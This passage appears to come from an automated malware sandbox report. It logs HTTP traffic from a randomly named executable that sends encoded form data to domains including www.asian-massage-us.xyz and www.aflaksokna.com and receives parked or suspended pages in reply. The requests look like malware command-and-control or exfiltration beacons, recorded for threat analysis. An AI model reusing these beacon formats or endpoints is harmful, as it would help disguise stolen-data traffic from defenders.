                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 77 6c 41 52 4a 68 71 4c 6d 6d 57 56 48 38 62 2f 47 44 49 68 77 7a 4a 7a 64 6e 34 35 6b 66 74 33 6b 36 4f 65 2f 47 75 32 2f 41 4c 62 6d 32 38 66 32 4c 59 73 72 44 4e 75 50 68 66 30 74 35 66 34 39 39 75 47 30 44 50 5a 55 4a 73 6f 43 49 79 30 4d 68 6a 5a 50 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wlARJhqLmmWVH8b/GDIhwzJzdn45kft3k6Oe/Gu2/ALbm28f2LYsrDNuPhf0t5f499uG0DPZUJsoCIy0MhjZPw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                        Sep 3, 2024 10:44:44.455391884 CEST599INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMGM1YTQ0NmItNGRlYS00YWRhLTlmMjMtYjhiNzAzOGQ4YjlmIiwicGFnZV90aW1lIjoxNzI1MzUzMD


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        15192.168.2.464993199.59.243.226804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:44:46.582942963 CEST10838OUTPOST /kc69/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 10299
                        Host: www.asian-massage-us.xyz
                        Origin: http://www.asian-massage-us.xyz
                        Referer: http://www.asian-massage-us.xyz/kc69/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 41 6b 42 6c 30 78 4e 53 47 6b 76 6b 2f 69 52 30 6e 74 31 71 2b 4b 63 49 50 30 46 66 6f 6d 36 6d 6d 30 31 6a 73 69 71 31 44 46 6a 79 45 74 47 4b 59 45 31 73 66 52 31 78 75 47 64 36 6b 6c 48 4a 56 30 62 74 48 6b 52 47 76 4b 44 54 2f 70 69 61 4b 52 57 65 49 62 7a 44 6e 66 6d 37 4d 32 69 41 35 34 67 67 58 48 46 41 62 33 49 79 77 76 67 75 75 4f 37 72 32 71 4b 39 65 35 48 53 68 61 64 6f 56 37 32 6e 30 52 62 6a 7a 4c 49 52 59 4a 36 59 34 66 72 6e 5a 45 34 54 69 52 41 4f 53 46 63 54 4b 5a 49 32 30 4b 44 62 47 6d 79 52 39 79 5a 33 51 30 4b 2b 66 56 74 39 48 63 77 6a 6f 32 77 33 43 39 4e 31 7a 36 61 2f 4a 61 43 70 49 45 4a 31 42 6c 4c 4e 6c 2b 65 44 51 4a 48 38 6c 63 63 61 42 75 79 50 35 54 4e 47 78 50 47 42 42 6e 42 41 44 55 55 55 37 73 37 61 59 2b 31 38 4e 72 33 7a 66 50 49 4c 59 41 76 77 38 63 58 43 58 37 61 4c 76 4f 4d 6f 4a 55 44 64 4c 56 37 6b 4f 77 5a 67 6d 4a 43 4d 30 6e 6e 6f 33 78 4c 70 66 70 6e 66 7a 57 63 33 57 2b 34 43 5a 66 2b 32 59 54 52 67 75 63 58 6a 70 39 57 4c 75 4b 78 4a 6d 46 31 [TRUNCATED]
                        Data Ascii: Qd=AkBl0xNSGkvk/iR0nt1q+KcIP0Ffom6mm01jsiq1DFjyEtGKYE1sfR1xuGd6klHJV0btHkRGvKDT/piaKRWeIbzDnfm7M2iA54ggXHFAb3IywvguuO7r2qK9e5HShadoV72n0RbjzLIRYJ6Y4frnZE4TiRAOSFcTKZI20KDbGmyR9yZ3Q0K+fVt9Hcwjo2w3C9N1z6a/JaCpIEJ1BlLNl+eDQJH8lccaBuyP5TNGxPGBBnBADUUU7s7aY+18Nr3zfPILYAvw8cXCX7aLvOMoJUDdLV7kOwZgmJCM0nno3xLpfpnfzWc3W+4CZf+2YTRgucXjp9WLuKxJmF1BatN1VKrR6A1BekBK2kCG4HOVb2ryhc4r78ZFYX4AwZ8tg6ud9FcFl8tSQ7MdFJ7FeOdKa3mHc3CUNw1voRXAMg8SrwFxz6K5g8d5OvTY5XbtMZnxaJ5c/1l5kuoiPV67bBig6QJJJMScmdUqJ5F/a0+SuU94T8CtKS2UXEzPhuBCU5LW/XRFzbfwsRfiK8LvCrR6bluYGXQMxdqtQi/OxJ0o+gcw/ZMaxrGubDGwW78RvxCCIDVi5JffZIR3JPDI3kzChI+L2XqGP3gKuddlqsWmZ/xYhuFwCkzBJv+gj1x/R5dQZL7psbxwB396mZ8WueC1w4d9l/xD6NCjLd6MgjfjEJodMPu4LzIc/S2ctTAM/1+KaMZPrvkKN3eqxsW/MOKOC4AotrFFrQruJhuMwDYHBofP7b2QZlop+NEsFqtHd/MNX1RRZbtNSA/yPTgLAGNhK4sXLkZQUQG+hH4sKSKIFiNeRCFI24a8W4RcpRsSxZKiZkS+3LrH/RckHbe88ZBqaas7Hk4grUFfAsn0bb4QyIbec6/gEI1mwVMdMcdl1c+/INWN/yRsZmHvUjs83kDfsODoNX7aVXh+lB/R1Ay2acqyIpUZNW7B/jCZgc9ImcwjPVXcxN+jQ/ZgowSjTVFSy5IcdGIQ0WDCcajQKWRR4P0yQQPMu [TRUNCATED]
                        Sep 3, 2024 10:44:47.032680988 CEST1236INHTTP/1.1 200 OK
                        date: Tue, 03 Sep 2024 08:44:46 GMT
                        content-type: text/html; charset=utf-8
                        content-length: 1146
                        x-request-id: 888a238a-76e4-487f-894b-f6891e0ead03
                        cache-control: no-store, max-age=0
                        accept-ch: sec-ch-prefers-color-scheme
                        critical-ch: sec-ch-prefers-color-scheme
                        vary: sec-ch-prefers-color-scheme
                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wlARJhqLmmWVH8b/GDIhwzJzdn45kft3k6Oe/Gu2/ALbm28f2LYsrDNuPhf0t5f499uG0DPZUJsoCIy0MhjZPw==
                        set-cookie: parking_session=888a238a-76e4-487f-894b-f6891e0ead03; expires=Tue, 03 Sep 2024 08:59:46 GMT; path=/
                        connection: close
                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 77 6c 41 52 4a 68 71 4c 6d 6d 57 56 48 38 62 2f 47 44 49 68 77 7a 4a 7a 64 6e 34 35 6b 66 74 33 6b 36 4f 65 2f 47 75 32 2f 41 4c 62 6d 32 38 66 32 4c 59 73 72 44 4e 75 50 68 66 30 74 35 66 34 39 39 75 47 30 44 50 5a 55 4a 73 6f 43 49 79 30 4d 68 6a 5a 50 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wlARJhqLmmWVH8b/GDIhwzJzdn45kft3k6Oe/Gu2/ALbm28f2LYsrDNuPhf0t5f499uG0DPZUJsoCIy0MhjZPw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                        Sep 3, 2024 10:44:47.032713890 CEST599INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiODg4YTIzOGEtNzZlNC00ODdmLTg5NGItZjY4OTFlMGVhZDAzIiwicGFnZV90aW1lIjoxNzI1MzUzMD


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        16192.168.2.464994199.59.243.226804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:44:49.123464108 CEST450OUTGET /kc69/?Qd=NmpF3EhDDWuD2jtxofhf+uMKfjRAnSqtmyJn51mvGwf0ZsSxS3FqZkMY4E4Bhni9ZRnQKXdCwf/FxLiQBiKGPfCZkMeDDDW6mIEhSXgEQREY6q1xuM7O6IY=&0z=mDcdcR8 HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-us
                        Connection: close
                        Host: www.asian-massage-us.xyz
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Sep 3, 2024 10:44:49.740858078 CEST1236INHTTP/1.1 200 OK
                        date: Tue, 03 Sep 2024 08:44:49 GMT
                        content-type: text/html; charset=utf-8
                        content-length: 1458
                        x-request-id: aa664475-8b2f-4827-a97c-81a61b080132
                        cache-control: no-store, max-age=0
                        accept-ch: sec-ch-prefers-color-scheme
                        critical-ch: sec-ch-prefers-color-scheme
                        vary: sec-ch-prefers-color-scheme
                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ieSIiqzE/FTrCRiHd1MKSZ8ffHjMyq3d7b7Mkbk+0NdLgGkLANDihZBqGqxBJTbzC7mYBfeKiEvzg+x5pZenDw==
                        set-cookie: parking_session=aa664475-8b2f-4827-a97c-81a61b080132; expires=Tue, 03 Sep 2024 08:59:49 GMT; path=/
                        connection: close
                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 69 65 53 49 69 71 7a 45 2f 46 54 72 43 52 69 48 64 31 4d 4b 53 5a 38 66 66 48 6a 4d 79 71 33 64 37 62 37 4d 6b 62 6b 2b 30 4e 64 4c 67 47 6b 4c 41 4e 44 69 68 5a 42 71 47 71 78 42 4a 54 62 7a 43 37 6d 59 42 66 65 4b 69 45 76 7a 67 2b 78 35 70 5a 65 6e 44 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ieSIiqzE/FTrCRiHd1MKSZ8ffHjMyq3d7b7Mkbk+0NdLgGkLANDihZBqGqxBJTbzC7mYBfeKiEvzg+x5pZenDw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                        Sep 3, 2024 10:44:49.740905046 CEST911INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYWE2NjQ0NzUtOGIyZi00ODI3LWE5N2MtODFhNjFiMDgwMTMyIiwicGFnZV90aW1lIjoxNzI1MzUzMD


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        17192.168.2.4649955.144.130.52804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:45:02.977329969 CEST718OUTPOST /ifo8/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 199
                        Host: www.aflaksokna.com
                        Origin: http://www.aflaksokna.com
                        Referer: http://www.aflaksokna.com/ifo8/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 37 57 67 70 66 49 44 34 6f 46 59 35 44 74 68 68 78 39 59 6e 76 50 43 53 54 59 6b 6f 44 31 35 7a 45 57 6d 43 79 65 63 50 57 51 74 65 48 63 65 46 7a 74 30 51 64 71 45 73 49 48 74 62 57 38 72 64 70 76 35 4c 67 30 41 47 63 63 38 71 47 47 4d 75 52 68 77 39 69 65 79 4e 53 30 66 47 2f 57 57 4a 55 33 54 47 38 4c 58 53 76 4c 74 50 58 49 39 59 68 44 42 48 7a 69 64 44 36 4f 49 65 45 37 4a 41 48 36 4a 32 4d 54 41 58 75 39 46 61 46 4a 78 36 55 33 52 56 38 70 45 70 35 69 31 66 4b 70 63 2f 51 67 77 37 77 58 41 2f 7a 41 30 70 70 30 57 59 2b 71 42 72 6c 36 45 36 74 65 36 7a 75 46 74 51 5a 77 3d 3d
                        Data Ascii: Qd=7WgpfID4oFY5Dthhx9YnvPCSTYkoD15zEWmCyecPWQteHceFzt0QdqEsIHtbW8rdpv5Lg0AGcc8qGGMuRhw9ieyNS0fG/WWJU3TG8LXSvLtPXI9YhDBHzidD6OIeE7JAH6J2MTAXu9FaFJx6U3RV8pEp5i1fKpc/Qgw7wXA/zA0pp0WY+qBrl6E6te6zuFtQZw==


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        18192.168.2.4649965.144.130.52804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:45:05.518990040 CEST738OUTPOST /ifo8/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 219
                        Host: www.aflaksokna.com
                        Origin: http://www.aflaksokna.com
                        Referer: http://www.aflaksokna.com/ifo8/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 37 57 67 70 66 49 44 34 6f 46 59 35 44 4d 52 68 33 65 41 6e 6e 50 43 54 50 6f 6b 6f 4e 56 35 6f 45 57 71 43 79 63 78 43 56 6c 39 65 48 35 61 46 79 73 30 51 65 71 45 73 44 6e 74 65 5a 63 72 73 70 76 38 6f 67 78 34 47 63 63 34 71 47 44 6f 75 52 53 49 79 6a 4f 79 50 61 55 66 49 37 57 57 4a 55 33 54 47 38 4c 54 6f 76 4c 31 50 57 34 4e 59 75 47 74 41 36 43 64 41 7a 75 49 65 54 72 4a 45 48 36 4a 49 4d 53 73 78 75 37 5a 61 46 49 42 36 55 6b 4a 57 7a 70 45 6e 39 69 30 51 47 59 31 4b 5a 78 31 48 76 30 6f 6e 30 7a 34 31 6f 79 48 43 76 62 67 38 33 36 67 4a 77 5a 7a 48 6a 47 51 5a 43 35 78 30 65 56 56 31 57 73 50 4a 6a 58 64 75 30 38 50 50 75 59 6b 3d
                        Data Ascii: Qd=7WgpfID4oFY5DMRh3eAnnPCTPokoNV5oEWqCycxCVl9eH5aFys0QeqEsDnteZcrspv8ogx4Gcc4qGDouRSIyjOyPaUfI7WWJU3TG8LTovL1PW4NYuGtA6CdAzuIeTrJEH6JIMSsxu7ZaFIB6UkJWzpEn9i0QGY1KZx1Hv0on0z41oyHCvbg836gJwZzHjGQZC5x0eVV1WsPJjXdu08PPuYk=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        19192.168.2.4649975.144.130.52804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:45:08.061650038 CEST10820OUTPOST /ifo8/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 10299
                        Host: www.aflaksokna.com
                        Origin: http://www.aflaksokna.com
                        Referer: http://www.aflaksokna.com/ifo8/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 37 57 67 70 66 49 44 34 6f 46 59 35 44 4d 52 68 33 65 41 6e 6e 50 43 54 50 6f 6b 6f 4e 56 35 6f 45 57 71 43 79 63 78 43 56 6d 64 65 48 76 6d 46 79 50 73 51 66 71 45 73 64 58 74 66 5a 63 72 31 70 76 45 30 67 78 6b 57 63 65 77 71 46 68 67 75 58 6e 6b 79 70 4f 79 50 57 30 66 4a 2f 57 57 6d 55 7a 33 43 38 49 37 6f 76 4c 31 50 57 37 56 59 71 54 42 41 32 69 64 44 36 4f 49 6f 45 37 4a 6f 48 36 67 77 4d 53 6f 48 75 4e 70 61 43 6f 52 36 53 58 74 57 36 70 45 6c 78 43 31 50 47 59 70 6a 5a 31 55 32 76 31 63 64 30 30 77 31 72 32 2b 6f 79 76 56 71 6b 70 67 4f 75 70 53 73 37 6e 77 6f 42 4c 39 65 61 6e 64 4c 4d 6f 37 6c 6f 48 63 42 68 65 54 52 78 65 67 49 47 33 56 45 6c 65 72 43 41 42 7a 2b 4b 45 67 35 49 57 30 55 7a 5a 78 65 77 61 4c 4c 6e 34 62 4b 47 44 6f 52 41 52 39 7a 36 4e 6d 4e 70 30 57 75 36 51 70 5a 37 67 41 49 2b 74 4a 36 65 78 42 71 75 42 41 70 76 65 4d 63 6e 6f 75 5a 44 49 70 4b 36 39 4c 6c 7a 4d 6a 4a 68 77 46 73 6b 62 4f 55 46 42 78 45 43 62 39 30 45 76 64 69 53 4b 37 47 47 38 62 36 47 37 6f [TRUNCATED]
                        Data Ascii: Qd=7WgpfID4oFY5DMRh3eAnnPCTPokoNV5oEWqCycxCVmdeHvmFyPsQfqEsdXtfZcr1pvE0gxkWcewqFhguXnkypOyPW0fJ/WWmUz3C8I7ovL1PW7VYqTBA2idD6OIoE7JoH6gwMSoHuNpaCoR6SXtW6pElxC1PGYpjZ1U2v1cd00w1r2+oyvVqkpgOupSs7nwoBL9eandLMo7loHcBheTRxegIG3VElerCABz+KEg5IW0UzZxewaLLn4bKGDoRAR9z6NmNp0Wu6QpZ7gAI+tJ6exBquBApveMcnouZDIpK69LlzMjJhwFskbOUFBxECb90EvdiSK7GG8b6G7os/Wi1fnHsWOyUnHKBs2TFWDkWnNWAslH9MxbgbsvefO8HpAmCRCCBiQ9mhgishz2QFAzIDobfP4ywaQ2qX1l7HEfvobXtGsZnvBvKYawcS2tUb0sgKef2ykbLY5h9nS3n5wzNDhTx5l0ZEV9Xlkgt9u2S0JjiYcBS65tPPoNOgKn4xfGzMKVIY1u9AtDf+Cc7agoFBsTBQvV3pFnS8E0zYYaPCzg2WUYoZW7HZF1cohGY58uwt3UYmwkfqmj4IaAZAM2korbYEkqK1robqpoiCXXN+zH4qWCqQe71Ks5vLtMWm0/R/dTzRmORUogr7uFkzqgoX+5IQeMoeeMahfy2yCC99pLZuc/HPBvdqTYnFNDxMk5ItEZeTXIjw3Tkw6SXeDD/Tlgz7f1l4ex0BXPwjiSuQI1eQKyrE4SFFE73Jpe0kQgrrPkWC9bHpDSujHRb5yvAxfWw+GxWobKWIBZwO5uprClRjkei83lBRQeUeddktfItRgZ19ucuK2EgL3rXDjXNRt1es2jvGTuIeNQ9LvpqYR/xw+VQifBGAbQ+9AJMJvkdJL6957qZbiWRYz+o6j1F9XOrPAljJ6iIMtJQa4auTPr/WTGSSJhnPIwZntxn8uk0Q8G1B1izZRSJvf/xtnlG3UdynEsk9J+reDK/+U+ouezrhimsj [TRUNCATED]


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        20192.168.2.4649985.144.130.52804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:45:10.606331110 CEST444OUTGET /ifo8/?Qd=2UIJc9LRnkw4J/sjwPFL6L3Afu5wGks/WFWPir8WYxJAH+6g3fgbQ7tbeiY6criSjvcvowcgMck3cAUpTS0Ai97RVhv74jWRAFbEzbWtj6FAfvZ7ty5v1Bw=&0z=mDcdcR8 HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-us
                        Connection: close
                        Host: www.aflaksokna.com
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Sep 3, 2024 10:45:20.394939899 CEST1156INHTTP/1.1 302 Found
                        Connection: close
                        content-type: text/html
                        content-length: 771
                        date: Tue, 03 Sep 2024 08:45:20 GMT
                        cache-control: no-cache, no-store, must-revalidate, max-age=0
                        location: http://www.aflaksokna.com/cgi-sys/suspendedpage.cgi?Qd=2UIJc9LRnkw4J/sjwPFL6L3Afu5wGks/WFWPir8WYxJAH+6g3fgbQ7tbeiY6criSjvcvowcgMck3cAUpTS0Ai97RVhv74jWRAFbEzbWtj6FAfvZ7ty5v1Bw=&0z=mDcdcR8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


